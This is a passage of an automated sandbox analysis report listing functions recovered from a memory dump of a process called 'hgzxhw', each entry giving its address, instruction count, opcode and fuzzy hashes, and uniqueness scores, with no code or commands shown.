                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e282a79f816ca47414198422dc3624b5d86a8bb78aec4457af8c4e5ac442c9c7
                                                                                                                                                                                            • Instruction ID: 174ac2fd2ddc4cf6f153d88af04afa4345cba631dfa72469ec6f380e63da21fa
                                                                                                                                                                                            • Opcode Fuzzy Hash: e282a79f816ca47414198422dc3624b5d86a8bb78aec4457af8c4e5ac442c9c7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F41F752A0DAC94FF399927C485A7666BD1DF9A650F4842FED18DCB3E7DC0C5C0A4381
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A234 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a8db0a64f9fd4d21744105a30a09f12c32fa8bfacd4e33d1eba01b38279def8f
                                                                                                                                                                                            • Instruction ID: 810ac71332daf118a1370b89a48710285ac3dd75b9e15d4e1ef32b89b7d453a3
                                                                                                                                                                                            • Opcode Fuzzy Hash: a8db0a64f9fd4d21744105a30a09f12c32fa8bfacd4e33d1eba01b38279def8f
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB31A730B59A4A8FEB59FB7884612B8B792EF8A210B0441BED04FD76D7CE2DA4058740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC25965D Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4d2094957e9c841767be5a7a8f061e01387645370eb5034cdbce12ba645130e5
                                                                                                                                                                                            • Instruction ID: ad371408487f6ee89c5f57a9e4e5eb0df7af24fbf515d102d1e8ba33ebe9f4ae
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d2094957e9c841767be5a7a8f061e01387645370eb5034cdbce12ba645130e5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F31D231A0A9198FFB58BB18D4546BA37D1EF8A301B1540BED44EC729ADD29EC4B87D0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A1BD Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: aeb1eb6894c9c8d5b7599daa936ff4027d78829338fe13fd9c99020d83f9bfb4
                                                                                                                                                                                            • Instruction ID: 21db503ebbfafffd0cecde96dfbb289af4028493b1ba014b846e7ad86bf864e6
                                                                                                                                                                                            • Opcode Fuzzy Hash: aeb1eb6894c9c8d5b7599daa936ff4027d78829338fe13fd9c99020d83f9bfb4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4821257190E789CFE745F77898192B53BE1EF4A311B0841B6E04DDB2A2DA28DC4D8791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249DF8 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 77b7eb11ed2fabadb10a8c42d52e74e1119d04158717537034a6afbc8c641c5b
                                                                                                                                                                                            • Instruction ID: 4a2614461d03a9881af8ea06568b701699043f24be7d01647bf76aed63f7a6ba
                                                                                                                                                                                            • Opcode Fuzzy Hash: 77b7eb11ed2fabadb10a8c42d52e74e1119d04158717537034a6afbc8c641c5b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7021E570A1EA898FD755E77888652BEBBD0EF4A210B0442BFD04ED77E2CA1854098381
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC25A2B9 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a4278d2581d879be7747a92c5a637cc43ed949110a187f48aeeb924c1b0be914
                                                                                                                                                                                            • Instruction ID: 5b5ca2088b79c13206cb11206a05b5f27809a3946192e00f69b642fe5c438a90
                                                                                                                                                                                            • Opcode Fuzzy Hash: a4278d2581d879be7747a92c5a637cc43ed949110a187f48aeeb924c1b0be914
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2621C22190CA498FF340FB28C4096B6B7D0EF99314F5445BED44CD72A2DE1DE98A8381
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24D1A7 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ee783efe916fcf2280cf66fd89e3d4b39608a856079738cf42590619feb7c80d
                                                                                                                                                                                            • Instruction ID: 2f96637d420a5cb0a02ec95e4a6d919ab1fc57629452d5ba1f426dda6c111236
                                                                                                                                                                                            • Opcode Fuzzy Hash: ee783efe916fcf2280cf66fd89e3d4b39608a856079738cf42590619feb7c80d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F1196227084168AE758FF68E491AF67351EF95324B14C1B5D44DCE3ABC929F88AC7D0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249949 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d6c048049c81a70d422e487d7128e65a7571784c361b2af1002309e0c3a64884
                                                                                                                                                                                            • Instruction ID: 9ed260dcbb40cef000fcea8afa626a09bd7e181cf8f82d3225d23eeae1d08fe5
                                                                                                                                                                                            • Opcode Fuzzy Hash: d6c048049c81a70d422e487d7128e65a7571784c361b2af1002309e0c3a64884
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1311E532B09A484FD744EB7C58491E9BBD1DF8A210B0882BBD40DC736AED69980A43C2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249979 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 93605fd2a49581e06a98d6f6d8822f0481869f0b2bcb5d2be799eea5e4c49033
                                                                                                                                                                                            • Instruction ID: 2393abac0bd3f24cba1ce559382e597d7cafb0d40437f716bfeb8a83f594515d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 93605fd2a49581e06a98d6f6d8822f0481869f0b2bcb5d2be799eea5e4c49033
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9401C46160EB894FD346DB6C58541A57BE1DFCA21070942FBD44DC726BD9589C0A8392
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC25A949 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4ddb11531ec4af13997875bed2052e753a41168ae07e06bbb38a10ddcae93373
                                                                                                                                                                                            • Instruction ID: a492afbd72c3855d183443ea874f8ff6b3b03667a0c7571ff61de480b3a04d05
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ddb11531ec4af13997875bed2052e753a41168ae07e06bbb38a10ddcae93373
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6401B962B0C51ACBF60CEA6C485717572C6DB59310F05827ED84EC73D7ED28DC5A46C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249EB0 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 26608c5b7ff7e70a2b3dc4acb99cd392890c2bcc33fea4b98a103f143ea8a150
                                                                                                                                                                                            • Instruction ID: 81460d8fc762071d3a82d410f31d5c012dfca7b2cbfe60c239e1806d3e2f2454
                                                                                                                                                                                            • Opcode Fuzzy Hash: 26608c5b7ff7e70a2b3dc4acb99cd392890c2bcc33fea4b98a103f143ea8a150
                                                                                                                                                                                            • Instruction Fuzzy Hash: B2F0A035658E0D8F86B5EB2CD444A6373E1EBA8321355467AE48FC3668DE29FC468780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A169 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e9785091bb7fa08ca28ac78f3fb03ebfc0ea6777f86951437276c83f6c847fd6
                                                                                                                                                                                            • Instruction ID: 196eba328e0c7caabd5561780932df17dbde8f0b23ebc140f969aa6217fae682
                                                                                                                                                                                            • Opcode Fuzzy Hash: e9785091bb7fa08ca28ac78f3fb03ebfc0ea6777f86951437276c83f6c847fd6
                                                                                                                                                                                            • Instruction Fuzzy Hash: A5F0E231A0EA888FCB45B73C98591983BE0EF4A22174941F6E00CCB2A3DD28DC098381
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC25B23D Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e21832cd5ba875a823446806c9c89ae4583624434860fe60c5bf3c7e0d416b48
                                                                                                                                                                                            • Instruction ID: 2cbd70666309d413844af991d4260f05f5ca3f5bdde123861bac166eefb3b234
                                                                                                                                                                                            • Opcode Fuzzy Hash: e21832cd5ba875a823446806c9c89ae4583624434860fe60c5bf3c7e0d416b48
                                                                                                                                                                                            • Instruction Fuzzy Hash: DCF0F622B0C60E4BEB68EA6884918BA3382DB95310B04873EC10BC67D9EC28F4494280
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A180 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 748f2ddee26f719cc12eb7dd8593de6bdbebef9bef5c2cf395dcfbf0caddb0fb
                                                                                                                                                                                            • Instruction ID: 1f8341d72ba3919c3193d30cf37acf7b6412735cda316148b5e21fb5ff64c0bb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 748f2ddee26f719cc12eb7dd8593de6bdbebef9bef5c2cf395dcfbf0caddb0fb
                                                                                                                                                                                            • Instruction Fuzzy Hash: CFE04F30B59D088FDA58B37CE8095A832D5DF8E32274445B5E40DC73AADC69DC458380
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24B168 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 158008a6d6f32a6d783468a0b8c5b0c3391db8a259b59654f6c8323d7567f4a5
                                                                                                                                                                                            • Instruction ID: d41c4d97d5ca8a06a3ca2f3ef3730a21084828a66f786881aba2514b303c61ad
                                                                                                                                                                                            • Opcode Fuzzy Hash: 158008a6d6f32a6d783468a0b8c5b0c3391db8a259b59654f6c8323d7567f4a5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 52D02B3041F5854FD71A6B3404640993BD09F07110B9848FED4885B357C53D904E4341
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC25A9F2 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000015.00000002.2410800213.00007FFAAC248000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC248000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7ffaac248000_hgzxhw.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 43f164e4f3314969688f8729a29f61dbffe4c7465992a0dea08b8a1051f11d10
                                                                                                                                                                                            • Instruction ID: 199ebf6a15b17d5b3726c9b274321f1ad466d7c6e52def2014f27316c73fc55d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 43f164e4f3314969688f8729a29f61dbffe4c7465992a0dea08b8a1051f11d10
                                                                                                                                                                                            • Instruction Fuzzy Hash: 58C08036F4A119CFB319F624015313554475BCA240725D07D840DAA395CC3CD80F56C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%